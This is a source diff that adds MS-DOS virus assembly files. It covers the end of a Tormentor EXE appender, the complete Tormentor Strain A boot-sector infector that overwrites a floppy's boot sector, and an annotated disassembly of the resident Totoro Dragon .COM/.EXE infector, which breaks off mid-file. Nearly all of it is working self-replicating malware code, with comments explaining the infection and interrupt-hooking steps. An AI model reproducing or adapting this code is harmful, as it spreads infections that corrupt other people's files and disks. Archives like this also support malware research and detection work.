int 21
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
jnc cont1
jmp cant_open_file
cont1: xchg ax,bx
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
push dx
push ax
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx
xor dx,dx
int 21
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
no_exe:
infected:
mov ah,3e
int 21
Sick_or_EXE: mov ah,4f
jmp look4victim
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
pop ds
retf
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
Own_Dta db 02bh DUP(0)
Virus_End EQU $
end Virus_Start


543
MSDOS/Virus.MSDOS.Unknown.torment.asm Normal file
View File

@ -0,0 +1,543 @@
code_seg segment
assume cs:code_seg,ds:code_seg
org 100h
tormentor proc far
@disp macro string
mov dx,offset string
mov ah,09h
int 21h
endm
@exit macro
mov ax,4c00h
int 21h
endm
@cls macro mode
mov ah,00h
mov al,mode
int 10h
endm
start: jmp main
boot_area dw 256 dup (0)
boot_sec dw 512 dup (0)
message db "Tormentor Strain A",13,10
db "Written by The High Evolutionary",13,10
db "Copyright (C) 1991 by The RABID Nat'nl Development Corp."
db 13,10,13,10
db "Press any key to install onto media in drive A:",13,10
db "(Or press CTRL-C to abort)$",13,10
paused db 13,10,13,10
db "[Paused] Insert destination disk if desired and press",13,10
db "any key, otherwise, press any key$",13,10
done db "Done!$",13,10
r_fail db 13,10,13,10
db "Failed to READ in boot sector$",13,10
w_fail db 13,10,13,10
db "Failed to WRITE boot sector$",13,10
f_infec db 13,10,13,10
db "SHIT! We failed to write the virus code to the disk!!!$",13,10
r_boot db 13,10,13,10
db "Now READING in the boot sector$",13,10
w_boot db 13,10,13,10
db "Now WRITING the boot sector to track 719$",13,10
w_vir db 13,10,13,10
db "Now WRITING the VIRUS to the boot sector$",13,10
succ db 13,10,13,10
db "Success! We installed Tormentor onto the drive$",13,10
memerr db 13,10,13,10
db "BOMB! We had a memory allocation error. Bailing out...$",13,10
db 13,10
read_shit db 13,10,13,10
db "Reading in shit via INT 25...$",13,10
db 13,10
intro db "You are in Torment$",13,10
bootseg dw ? ; Storage segment address or mem. block
; containing copy of boot record
dssave dw ? ; Storage for DS register
;dssave dw seg group ; Storage for DS register
pspseg dw ? ; PSP segment storage
;stack segment para stack 'STACK' ; Code Segment
;stack ends
;_data segment word public 'DATA' ; Data Segment
;_data ends
;dgroup group data,stack ; Define segment group
;*****************************************************************************
; Boot record information to infect both floppies and hard-drives
;*****************************************************************************
bootrecord struc
bootjump db 3 dup (?) ; Initial 3 byte jmp instruction
oemstring db 8 dup (?) ; OEM version and DOS
sectorbytes dw ? ; Bytes per sector
clustersec db ? ; Sectors per cluster
reservedrec dw ? ; Reserved sectors
fatcopies db ? ; number of FAT copies
direntries dw ? ; number of root dir entries
totalsectors dw ? ; Total disk sectors
mediadescrip db ? ; Media Descriptor
fatsectors dw ? ; number of sectors occupied by 1 FAT
tracksectors dw ? ; number of sectors per track
heads dw ? ; number of heads
hiddensectors dw ? ; number of hidden sectors
bootrecord ends
drive db ? ; Current drive pointer
memalloc proc near
push bp ; Save base pointer
push bx ; Save BX
mov bp,sp ; init base pointer
xor al,al ; Zero out AL
mov ah,48h ; Allocate mem. function
int 21h
jnc end_memalloc ; exit if no error
mov word ptr [bp],bx
end_memalloc:
pop bx ; Restore BX
pop bp ; Restore Base Pointer
ret
memalloc endp
main:
get_default_drive:
mov ah,19h
int 21h
mov byte ptr drive,al ; Move current drive into drive
; mov ds,dssave ; Initialise DS
; mov ax,es ; get PSP address
; mov word ptr pspseg,ax ; and save it...
jmp read_boot
; mov bx,40h ; Allocate 1024 bytes
; call memalloc ; Allocate BX block of memory
; jnc read_boot
; @disp memerr
; jmp quit
read_boot:
@disp read_shit
mov ah,08h
int 21h
mov word ptr bootseg,ax
push ax ; Save AX onto the stack
mov al,0
; mov al,byte ptr drive ; Move current drive into AL
xor ah,ah ; Zero out AH
; pop ds ; Restore Data_seg
pushf ; Save flags
mov dx,0 ; Read in sector 0
mov cx,1 ; Read in 1 sector
mov bx,offset boot_sec ; Store data at DS:boot_sec
int 25h ; Read in the disk
popf ; clear flags used by flags
@disp done
mov ah,08h
int 21h
; assume ds:code_seg ; Restore DS
begin: @cls 03
; mov ah,00 ; Set screen
; mov al,03 ; Set screen for 80x25 color
; int 10h ; Call BIOS
@disp message
mov ah,08h ; Wait for a keypress
int 21h
mov cx,3
read_sector:
@disp r_boot ; Display that we are reading the
; sector from the disk
push cx ; Counter is pushed onto the stack
mov ax,201h ; Read in 1 sector
mov bx,offset boot_area ; Store it in boot_area
mov cx,1 ; Set counter to 1
mov dx,0 ; Set for drive 0, head 0
int 13h ; Call BIOS
pop cx ; Restore counter
jnc good_read ; If there were no errors, then
; jump to good_read
loop read_sector ; Jump back and try reading the sector
; again while CX>0
@disp r_fail
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_read:
mov cx,3 ; Set counter to 3
@disp paused ; Display message for pause
mov ah,08h ; Wait for a key
int 21h ; Call DOS
;*****************************************************************************
; Write good sector to track 719 (Head 1, track 27, sector 9)
;*****************************************************************************
write_sector:
@disp w_boot ; Display that we are writing the
; sector to disk
mov ax,301h ; Set for writing the boot sector
mov bx,offset boot_area ; Set buffer to what we read in
; mov bx,offset infected_data
mov cx,2709h ; Set counter to 2709h
mov dx,100h ; Head 1, drive 0
int 13h ; Call BIOS
pop cx ; Restore the counter
jnc good_write ; If we wrote the sectors allright,
; then jump to good_write
loop write_sector
@disp w_fail
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_write:
mov cx,3 ; Copy 3 into CX
@disp w_vir
infect_floppy:
push cx ; Push it onto the stack
mov ax,301h ; Write 1 sector
mov bx,offset infected_data ; Write corrupt boot sector to the
; drive
mov cx,1 ; Set counter to 1
mov dx,0 ; Set for drive A:
int 13h ; Call BIOS
jnc good_infection ; If there are no problems, then
; continue
loop infect_floppy ; Otherwise, try again until CX=0
@disp f_infec ; If CX=0, then display the message
; and then exit
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_infection:
@disp succ
mov ax,4c00h
int 21h
;*****************************************************************************
; The following is a copy of the infected boot sector to copy to sector 0
;*****************************************************************************
infected_data db 0EBh, 34h
nop
dec cx
inc dx
dec bp
and [bx+si],ah
xor bp,word ptr ds:[33h]
add al,[bp+si]
add [bx+si],ax
add dh,[bx+si+0]
rol byte ptr [bp+si],1 ; Rotate
std ; Set direction flag
add al,[bx+si]
or [bx+si],ax
add al,[bx+si]
db 19 dup (0)
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
adc al,[bx+si]
add [bx+si],al
add [bx+di],al
add dl,bh
xor ax,ax ; Zero register
mov ds,ax
mov ss,ax
mov bx,7C00h ; Pointer to boot segment
mov sp,bx
push ds
data_14 db 53h
dec word ptr ds:[413h]
int 12h ; Put (memory size)/1K in ax
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
xchg ax,word ptr ds:[4Eh]
mov word ptr ds:[7DABh],ax
mov ax,128h
xchg ax,word ptr ds:[4Ch]
mov word ptr ds:[7DA9h],ax
mov ax,es
xchg ax,word ptr ds:[66h]
mov word ptr ds:[7DAFh],ax
mov ax,0BBh
xchg ax,word ptr ds:[64h]
mov word ptr ds:[7DADh],ax
xor di,di ; Zero register
mov si,bx
mov cx,100h
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
sti ; Enable interrupts
push es
mov ax,85h
push ax
retf
push bx
xor dl,dl ; Zero register
call sub_2 ; (00FB)
pop bx
push ds
pop es
mov ah,2
mov dh,1
call sub_6 ; (011F)
jc loc_2 ; Jump if carry Set
push cs
pop ds
mov si,offset ds:[0Bh]
mov di,offset ds:[7C0Bh]
mov cx,2Bh
cld ; Clear direction
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_ret_3 ; Jump if zero
loc_2:
pop bx
pop ax
push cs
mov ax,0AFh
push ax
loc_ret_3:
retf ; Return far
read_error:
push cs
pop ds
mov si,1DBh
call sub_1 ; (00DA)
xor ah,ah ; Zero register
int 16h ; Keyboard i/o ah=function 00h
; get keybd char in al, ah=scan
xor ax,ax ; Zero register
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
push cs
pop es
mov bx,offset ds:[200h]
mov cx,6
xor dx,dx ; Zero register
mov ax,201h
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
jc read_error ; Jump if carry Set
mov cx,0FF0h
mov ds,cx
jmp dword ptr cs:data_16
;
; Insert Tormentor endp here...
;
;tormentor endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
loc_5:
mov bx,7
cld ; Clear direction
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_ret_9 ; Jump if zero
jns loc_6 ; Jump if not sign
xor al,0D7h
or bl,88h
loc_6:
cmp al,20h
jbe loc_7 ; Jump if below or =
mov cx,1
mov ah,9 ;
int 10h ; Video display ah=functn 09h
; set char al & attrib bl @curs
loc_7:
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
jmp short loc_5 ; (00DA)
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
mov bx,200h
mov cx,2
mov ah,cl
call sub_5 ; (011D)
mov cx,2709h
xor byte ptr es:[bx],0FDh
jz loc_8 ; Jump if zero
mov cx,4F0Fh
loc_8:
jmp short loc_ret_9 ; (0127)
nop
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
mov ah,2
mov bx,200h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_4:
mov cx,1
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
mov dh,0
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_6:
mov al,1
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_7:
pushf ; Push flags
call dword ptr cs:data_15
loc_ret_9:
retn
sub_1 endp
push ax
push bx
push cx
push dx
push es
push ds
push si
push di
pushf ; Push flags
push cs
pop ds
cmp dl,1
ja loc_11 ; Jump if above
and ax,0FE00h
jz loc_11 ; Jump if zero
xchg al,ch
shl al,1 ; Shift w/zeros fill
add al,dh
mov ah,9
mul ah ; ax = reg * al
add ax,cx
sub al,6
cmp ax,6
ja loc_11 ; Jump if above
push cs
pop es
call sub_3 ; (0115)
jc loc_10 ; Jump if carry Set
mov di,offset data_14
mov si,offset ds:[243h]
mov cx,0Eh
std ; Set direction flag
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to
; es:[di]
jz loc_11 ; Jump if zero
sub si,cx
sub di,cx
mov cl,33h ; '3'
rep movsb ; Rep when cx >0 Mov [si] to
; es:[di]
call sub_2 ; (00FB)
push cx
push bx
call sub_3 ; (0115)
mov ah,3
xor bx,bx ; Zero register
call sub_4 ; (011A)
pop bx
pop cx
jc loc_10 ; Jump if carry Set
mov dh,1
mov ah,3
call sub_6 ; (011F)
loc_10:
xor ax,ax ; Zero register
call sub_7 ; (0121)
loc_11:
mov ah,4
int 1Ah ; Real time clock ah=func 04h
; read date cx=year, dx=mon/day
cmp dh,9
jne not_month ; Jump if not equal
mov si,1B1h
call sub_1 ; (00DA)
not_month:
popf ; Pop flags
pop di
pop si
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:data_15
data_15 dd 0C602EC59h
data_16 dd 0F000E6F2h
esc 2,ch ; coprocessor escape
and [bp+di-4141h],al
movsb ; Mov [si] to es:[di]
idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data
xchg ax,si
mov si,offset ds:[0B4A5h]
mov ax,0DAA7h
esc 5,[bx+si] ; coprocessor escape
db 'IO SYSMSDOS SYS', 0Dh, 0Ah
db 'Non-system disk or disk error', 0Dh
db 0Ah
add [bx+si],al
push bp
; jmp cont
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
stosb
;cont: stosb ; Store al to es:[di]
tormentor endp
quit: mov ax,4c00h
int 21h
code_seg ends
end start


713
MSDOS/Virus.MSDOS.Unknown.totoro.asm Normal file
View File

@ -0,0 +1,713 @@
;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt
;Newsletter 14. Profuse thanks to Stormbringer, wherever he is.
;***************************************************************************
;* The Totoro Dragon Virus from Taiwan *
;***************************************************************************
;* This virus is a fairly simple resident .EXE/.COM infector. It goes *
;*resident by re-executing the infected file and using Int 21, function 31.*
;*When it infects a .COM, it puts itself at the beginning of the file and *
;*starts the host at an offset of 600h (700h in memory), giving the virus *
;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker *
;*at the end ("YTIT"). It infects .EXE files using the "standard" method. *
;*While it does save file attributes, the time and date change when a file *
;*is infected. The virus activates on Saturdays. When active, it installs*
;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the *
;*text off the screen and prints the following in the upper left-hand *
;*corner: *
;* *
;* ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· *
;* º Totoro Dragon º *
;* ºHello! I am TOTORO CATº *
;* º Written by Y.T.J.C.T º *
;* º in Ping Tung. TAIWAN º *
;* º Don't Worry,be Happy º *
;* ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ *
;* *
;*It then restarts the counter and does it again. Other that this effect, *
;*the virus seems relatively harmless. *
;* *
;* *
;* Disassembly by Stormbringer *
;***************************************************************************
.model tiny
.radix 16
.code
org 100h
start:
jmp short COM_Entry_Point
nop
;***************************************************************************
;* Data Tables *
;***************************************************************************
File_Size_Off dw 5
File_Size_Seg dw 0
TSR_DAT dw 4262h
DS_Save dw 0F21h
ES_Save dw 0F21h
File_Attribs dw 20h
IP_Save dw 0
CS_Save dw 0F99
SP_Save dw 0
SS_Save dw 0
File_Type db 'C'
Wasted_Space db 0, 0, 0 ;?
;********************************************
; EXE_Header ;
;********************************************
EXE_Sig db 'MZ'
Last_Page_Len dw 14h
EXE_Size dw 5
Rel_Tbl_Items dw 0
Header_Size dw 20h
Minalloc dw 0
Maxalloc dw 0ffff
Init_SS dw 1
Init_SP dw 700h
Checksum dw 0
Init_IP dw 91h
Init_CS dw 1
First_Rel dw 001Eh
Overlay_Num dw 0
;********************************************
CS_Store dw 0
Command db 'COMMAND.COM', 0
db 00h, 80h, 00h
ES_Store_1 dw 0F21h
dw 5Ch
ES_Store_2 dw 0F21h
dw 6Ch
ES_Store_3 dw 0F21h
File_Handle dw 5
Buffer_For_Checks db 0
db 4Ch,0CDh, 21h
File_Name_Off dw 469h
File_Name_Seg dw 0DF5h
db 0
Mem_Seg dw 0F93h
IP_24 dw 156h
CS_24 dw 0DF5h
;************************************************************************
;* Virus Entry Point #1 (COM) *
;************************************************************************
COM_Entry_Point:
mov ax,0F1F1h ;Is the virus in memory?
int 21h
mov cs:CS_Store,0
mov cs:[ES_Save],es
cmp ax,0F1F1h ;AX preserved?
je Already_Installed ;Same? go Already_Installed
jmp Install_Virus ;Not In Mem? go Install_Virus
Already_Installed: ;Restore control to host file (COM)
mov ax,cs
mov es,ax ;ES = DS = CS
mov ds,ax
mov ah,0CBh ;Restore Control
mov si,700h ;Offset of host in file
mov di,100h ;Original offset of host
mov cx,cs:[File_Size_Off] ;Size of host file
int 21h ;Call internal routine to restore control
;to host .COM file.
;************************************************************************
;* Virus Entry Point #2 (EXE) *
;************************************************************************
EXE_Entry_Point:
mov ax,cs
sub ax,10h
push ax
mov ax,offset After_Jump
push ax
retf ;Jump to After_Jump with
;original .COM offsets.
After_Jump:
mov cs:[ES_Save],es
mov cs:[DS_Save],ds
mov ax,0F1F1h
int 21h
cmp ax,0F1F1h ;Check if installed.
jne Get_New_Seg ;Nope, Install....
cli
mov ax,cs:[SS_Save] ;Yes, restore host regs
add ax,10h
mov bx,es
add ax,bx
mov ss,ax
mov sp,cs:[SP_Save]
sti
mov ax,cs:[CS_Store]
mov bx,es
add ax,bx
add ax,10h
mov word ptr cs:[IP_Save+2],ax
jmp dword ptr cs:[IP_Save] ;Restore Control to
;.EXE host.
Get_New_Seg:
push es ;For later RETF
xor ax,ax
mov ds,ax ;DS = 0
;****************************************************************************
;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper *
;* (unused) part of the interrupt tables. This virus uses the top three*
;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed *
;* by a retf. This is to copy the virus to a new segment in memory and*
;* jump to it. *
;****************************************************************************
mov word ptr ds:[3fdh],0A4F3h ;repnz movsb
mov byte ptr ds:[3ffh],0CBh ;retf
push cs
pop ds
mov si,100h
mov di,si ;Copy virus to new segment
mov cx,600h ;and "RETF" to
mov ax,offset Install_Virus ;Install_Virus in new copy
push ax
db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh
Install_Virus:
cli ;Disable interrupts
push cs
pop ds
mov ah,2Ah
int 21h ;Get Day/Date
cmp al,6 ;Is it Saturday?
jne Set_Int_21 ;Nope, don't activate, just
mov ax,3508h ;infect files.
int 21h ;Get Int 08 address
mov word ptr cs:[IP_08],bx
mov word ptr cs:[CS_08],es
mov dx,offset Int_08
mov ax,2508h
int 21h ;Set Int 08
Set_Int_21:
mov ax,3521h
int 21h ;Get Int 21 address
mov word ptr cs:[IP_21],bx
mov word ptr cs:[CS_21],es
mov dx,offset Int_21
mov ax,2521h
int 21h ;Set Int_21
mov es,cs:[ES_Save]
cmp cs:[TSR_DAT],426Bh ;Second Execute?
je Go_TSR ;Yep, go TSR
mov bx,1000h ;Nope, set up for second exec.
mov ah,4Ah
int 21h ;Change Mem Allocation
;to 64k.
mov es,es:[2ch] ;Environment string
xor di,di
xor al,al
mov cx,7FFFh
Find_Filename: ;Search Environment for
repne scasb ;filename of host.
cmp es:[di],al
loopnz Find_Filename
add di,3 ;Skip drive designator
;i.e. "C:\" in
;"C:\Infected.EXE"
mov dx,di
push es
pop ds ;DS:DX = host filename
push cs
pop es
cli ;Clears Ints (so none can
;disrupt second execution
;of virus)
mov ax,cs:[ES_Save]
mov cs:[ES_Store_1],ax
mov cs:[ES_Store_2],ax
mov cs:[ES_Store_3],ax
mov bx,144h
mov ax,4B00h ;Re-Execute the file
pushf
call dword ptr cs:[IP_21] ;Call Int 21 to Execute file.
Go_TSR:
mov ah,31h
mov dx,71h
int 21h ;Terminate and Stay Resident.
Int_21:
pushf ;Push flags
cmp ax,0F1F1h ;Is it an Install Check?
jne Is_It_Execute ;No, Go Is_It_Execute
mov ax,0F1F1h ;Yes, save value (unneccesary)
popf
iret ;Return to virus in program.
Is_It_Execute:
cmp ax,4B00h ;Is it a Load & Execute call?
jne Restore_Host ;Nope, continue on.
call execute ;Infect the file if possible.
jmp short Go_Int_21 ;And go to old Int 21 handler.
nop
Restore_Host:
cmp ah,0CBh ;Is it a request to restore
jne Go_Int_21 ;control to host?
pop ax ax ;Pop flags + Old IP (not kept)
mov word ptr cs:[IP_Save],100h
pop ax
mov word ptr cs:[IP_Save+2],ax
rep movsb ;Restore Host to orig. Pos.
popf ;Completely remove old Int call
mov ax,0
jmp dword ptr cs:[IP_Save] ;Jump to Host:100
Go_Int_21:
popf ; Pop flags
db 0ea ;Jump to Int 21
IP_21 dw 040ebh
CS_21 dw 0011
execute:
push es ds ax bx cx dx si di
mov cs:[File_Name_Seg],ds
mov cs:[File_Name_Off],dx
mov ax,3524h ;Get Int 24 Address
int 21h ;(Critical Error)
mov cs:[IP_24],bx
mov cs:[CS_24],es
push cs
pop ds
mov dx,offset Int_24
mov ax,2524h
int 21h ;Set Int 24
mov ds,cs:[File_Name_Seg]
mov si,cs:[File_Name_Off]
Name_Check:
lodsb
or al,al ;Is the first byte a zero?
jnz Name_Check ;Nope, find end of string
mov al,[si-2]
and al,0DFh
cmp al,4Dh ;'M'
je Is_Com ;COM file, jump Is_Com
cmp al,45h ;'E'
je Is_EXE ;EXE file, jump Is_EXE
jmp Clean_Up ;Neither? Go Clean_Up
Is_Com:
mov cs:[File_Type],'C' ;Save File type for later.
jmp short Check_If_Command
nop
Is_EXE:
mov cs:[File_Type],'E'
Check_If_Command:
sub si,0Ch
mov di,offset Command
push cs
pop es
mov cx,0Bh ;Is it Command.COM?
repe cmpsb
jnz Start_Infect ;No, Jump Start_Infect
Got_An_Error:
jmp Clean_Up ;Is Command, get otta here.
Start_Infect:
mov ds,cs:[File_Name_Seg]
mov dx,cs:[File_Name_Off]
mov ax,4300h
int 21h ;Get Attribs
jc Got_An_Error
mov cs:[File_Attribs],cx
xor cx,cx
mov ax,4301h
int 21h ;Zero Attrib's for read/write
jc Got_An_Error
mov ax,3D02h
int 21h ;Open Read/Write
jnc Check_Infect ;Everything Fine? go Check_Infect
jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs
Check_Infect:
mov bx,ax
mov cs:[File_Handle],ax
mov cx,0FFFFh
mov dx,0FFFCh
mov ax,4202h
int 21h ;Move to 4 bytes from end
add ax,4
mov cs:[File_Size_Off],ax
push cs
pop ds
mov dx,offset Buffer_For_Checks
mov cx,4
mov ah,3Fh
int 21h
;Read in Last 4 bytes of file
push cs
pop es
mov cx,4
mov si,offset Marker ;are last 4 bytes 'YTIT'?
mov di,offset Buffer_For_Checks ;
repe cmpsb
jnz Check_Which_Type ;Not infected? Go Check_Which_Type
jmp Close_File ;Infected? Go Close_File
Check_Which_Type:
cmp cs:[File_Type],'C' ;Is it a .COM?
je COM_Infect ;Yes, go COM_Infect
jmp EXE_Infect ;No, go EXE_Infect
COM_Infect:
mov ah,48h
mov bx,1000h
int 21h ;Allocate 64k of memory
jnc Load_In_File ;No Prob? Go Load_In_File
jmp Close_File ;Otherwise, go Close_File
Load_In_File:
mov cs:[Mem_Seg],ax
mov bx,cs:[File_Handle]
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Go to beginning of file
push cs
pop ds
mov es,cs:[Mem_Seg]
mov si,100
mov di,si
mov cx,700h
rep movsb
mov ds,cs:Mem_Seg
mov cx,cs:[File_Size_Off]
mov dx,700h
mov ah,3Fh ;Load entire file to directly
int 21h ;after virus.
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Move to the beginning of file
mov dx,100h
mov cx,cs:[File_Size_Off]
add cx,600h
mov ah,40h
int 21h ;Write entire file back to disk
jc Go_Release_Mem
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ;Move to end of file
mov cs:[File_Size_Seg],0 ;COM < 64k
add ax,4 ;Add 4 for marker bytes
mov cs:[File_Size_Off],ax ;Save file size
push cs
pop ds
mov dx,offset Marker
mov cx,4
mov ah,40h
int 21h ;Write in marker 'YTIT'
Go_Release_Mem:
jmp Release_Mem
jmp Close_File
EXE_Infect:
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h ;Move to beginning of file
push cs
pop ds
db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh]
mov cx,1Ch
mov ah,3Fh
int 21h ;Read in .EXE header
Save_Header_NFO:
cli ;clear ints
mov ax,cs:[Init_CS]
mov cs:[CS_Store],ax ;Save old CS
mov ax,cs:[Init_IP]
mov word ptr cs:[IP_Save],ax ;Save old IP
mov ax,cs:[Init_SS]
mov cs:[SS_Save],ax ;Save old SS
mov ax,cs:[Init_SP]
mov cs:[SP_Save],ax ;Save old SP
sti ;restore ints
xor ax,ax
cmp cs:[Last_Page_Len],0
je Calculate_Exe_Header
dec cs:[EXE_Size]
Calculate_Exe_Header: ;Long, drawn out way
;to calculate new EXE header
mov cx,200h
xor dx,dx
mov ax,cs:[EXE_Size]
mul cx
add ax,cs:[Last_Page_Len]
add ax,0Fh
adc dx,0
and ax,0FFF0h
mov cs:[File_Size_Off],ax
mov cs:[File_Size_Seg],dx
push dx ax dx ax
xor dx,dx
mov ax,cs:[Header_Size]
mov cx,10h
mul cx
pop bx cx
sub bx,ax
sbb cx,dx
xchg ax,bx
xchg dx,cx
mov cx,10h
div cx
mov cs:[Init_CS],ax
mov cs:[Init_SS],ax
mov cs:[Init_SP],700h
mov cs:[Init_IP],offset EXE_Entry_Point-100
pop ax dx
push dx ax
add ax,604h
adc dx,0
mov cx,200h
div cx
mov cs:Last_Page_Len,dx
or dx,dx
jz Rewrite_Header
inc ax
Rewrite_Header:
mov cs:[EXE_Size],ax
xor cx,cx
xor dx,dx
mov bx,cs:[File_Handle]
mov ax,4200h
int 21h ;Move back to beginning of file
push cs
pop ds
mov dx,offset EXE_Sig
mov cx,1Ch
mov ah,40h
int 21h ;Write EXE header back to file
pop dx
pop cx
jc Close_File
mov ax,4200h
int 21h ;Go to end of host.
push cs
pop ds
mov dx,100
mov cx,600h
mov ah,40h
int 21h ;Write Virus
jc Close_File
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ;Go to end of file.
mov dx,offset Marker
mov cx,4
mov ah,40h
int 21h ;Write marker byte.
jmp short Close_File
nop
Release_Mem:
mov es,cs:Mem_Seg
mov ah,49h
int 21h ;Release Memory
Close_File:
mov ah,3Eh
mov bx,cs:[File_Handle]
int 21h ;Close file.
Reset_Attribs:
mov ds,cs:File_Name_Seg
mov dx,cs:File_Name_Off
mov cx,cs:File_Attribs
mov ax,4301h
int 21h ;Reset File attributes
Clean_Up:
mov ds,cs:[CS_24] ;Restore Critical Error
mov dx,cs:[IP_24]
mov ax,2524h
int 21h
pop di si dx cx bx ax ds es
retn
Int_24: ;Critical Error Handler
xor ax,ax
iret
Int_08: ;Timer Click Handler
pushf
inc cs:[Activation_Counter]
cmp cs:[Activation_Counter],0CCCh
jne Go_Int_08
mov cs:[Activation_Counter],0 ;Reset Counter
push ds es si di ax bx cx dx
call Get_Mode
call Scroll_Area
call Print_Message
pop dx cx bx ax di si es ds
Go_Int_08:
popf ; Pop flags
db 0EA
IP_08 dw 003Ch
CS_08 dw 0D80h
Screen_Width dw 0
Activation_Counter dw 1E0h
Get_Mode:
mov ah,0Fh
int 10h ;Get Video Mode
mov bx,0B000h ;Mode 7 Text Video Memory
mov es,bx
cmp al,7
je In_Mode_7
mov bx,0B800h ;Regular Text Video Memory
In_Mode_7:
mov es,bx
mov ds,bx
mov cs:[Screen_Width],4Fh
Setup_Screen:
mov cx,19h
mov bx,0
Clear_Screen:
push cx
call Scroll_Line
add bx,0A0h
pop cx
loop Clear_Screen
dec cs:[Screen_Width]
jnz Setup_Screen
retn
Scroll_Line: ;This subroutine clears the
mov di,bx ;screen by scrolling the text
mov si,bx ;straight off of the left
add si,2 ;side.
mov cx,cs:[Screen_Width]
Scroll_Sideways:
lodsb
stosb
inc si
inc di
loop Scroll_Sideways
retn
Print_Message:
xor bx,bx
push cs
pop ds
db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design]
mov ah,0Eh
Print_Loop:
lodsb
int 10h ;Write Char in Teletype mode
cmp byte ptr [si],24h ;is it a '$'?
jne Print_Loop ;Nope, continue writing
retn
Scroll_Area:
xor bx,bx ;Video Page 0
mov ah,3
int 10h ;Get Cursor info
push dx ;Push Cursor Location (DX)
mov ah,6
mov bh,7
mov al,18h
xor cx,cx
mov dh,18h
mov dl,4Fh
int 10h ;Scroll up (clear screen)
mov ah,2
pop dx
sub dh,2
xor bx,bx
int 10h ;Reset Cursor
xor bx,bx
xor dx,dx
mov ah,2
int 10h ;Set Cursor for printing.
retn
Totoro_Design:
db ' ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·',0Dh, 0Ah
db ' º Totoro Dragon º',0Dh, 0Ah
db ' ºHello! I am TOTORO CATº',0Dh, 0Ah
